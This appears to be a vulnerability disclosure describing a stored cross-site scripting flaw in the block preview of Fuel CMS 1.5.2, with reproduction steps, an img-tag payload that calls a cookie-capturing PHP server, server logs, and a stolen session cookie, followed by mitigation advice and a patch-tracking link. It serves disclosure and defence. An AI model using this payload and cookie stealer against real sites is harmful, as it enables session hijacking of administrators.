Fuel CMS 1.5.2 | Stored XSS in block preview

Fuel CMS 1.5.2 uses a text editor for publishing pages and creating blocks. This editor has a preview feature that allows a moderator/admin to show a preview of the post before posting it.
This feature is vulnerable to XSS because if a user embeds malicious JavaScript then it gets executed once the post is previewed.

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:
php -S 0.0.0.0:1718
Login to FuelCMS and go to blocks section of the CMS:
http://127.0.0.1/fuelcms/fuel/blocks
Create a block and then open it for edit:
http://127.0.0.1/fuelcms/fuel/blocks/edit/1
In the view field where you have a larger textarea for editing the document, write the following payload & save it:
<img src='http://127.0.0.1:1718/capture.php' alt='dune'>

Now, click on “Preview” button and you will get connections in your PHP server:

[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 Accepted
[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 [200]: GET /capture.php
[Wed Jan  8 10:09:20 2025] 127.0.0.1:53440 Closing

Open cookie_log.txt and you shall see the cookies that were stolen:

[2025-01-08 15:09:20] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; ci_session=r0qirem7e4s1ascfhp4v60a82i02vlnr

N/A

Implement strict CSP rules and add filters to prevent users from inputting anything other than an image.

Follow this issue on GitHub for updates on patch:
https://github.com/daylightstudio/FUEL-CMS/issues/610